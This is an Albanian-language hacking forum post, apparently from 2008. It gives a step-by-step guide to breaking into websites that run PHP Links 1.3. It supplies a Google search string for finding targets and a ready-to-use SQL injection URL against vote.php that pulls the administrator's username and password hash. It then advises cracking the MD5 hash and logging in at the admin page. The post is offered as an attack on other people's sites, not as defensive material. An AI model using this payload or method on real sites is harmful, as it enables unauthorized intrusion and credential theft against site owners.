ForumPortaliRegjistrohuidentifikimi

Share | 
 

 Hack site Powered by PHP Links from DeltaScripts

Shko poshtė 
AutoriMesazh
noizy
Admin


Numri i postimeve : 197
Join date : 26/07/2008

MesazhTitulli: Hack site Powered by PHP Links from DeltaScripts   Sat Aug 09, 2008 3:52 pm

PHP Links <= 1.3 (vote.php id) Remote SQL Injection Vulnerability

Pra ky eshte exploit i marrur nga milw0rm.comsi te hackojm kesi faqe:shkojm ne www.google.com e kerkojm kshtu:
Powered by OTR Links from DeltaScripts dhe pastaj hym te ndonjeri dhe ja shtojm ket:

vote.php?id=-1%20union%20select%20concat(user_name,0x3a,user_pass),2,3,4,5,6%20from%20phplinks_users%20where%20user_id=1--

pra behet:

www.websajti.com/vote.php?id=-1%20union%20select%20concat(user_name,0x3a,user_pass),2,3,4,5,6%20from%20phplinks_users%20where%20user_id=1--

dhe pastaj nqoft se kemi fat ja gjemi md5 hashin dhe at
e crackojm me ndonje program, apo faqe md5 hash online qe jon
po un nuk munda te crackoj ndonje hash me faqe online po nqfot
se keni ndonje program ndoshta kini fatt
dhe nqoft se e gjeni passin athere mund ti hini ne Admin.Admin Login:

http://faqja.com/path/admin/
Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit http://tutoriale-al.4umer.com
 
Hack site Powered by PHP Links from DeltaScripts
Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
 :: Hacking/Cracking/WareZ/Download :: Hacking-
Kėrce tek: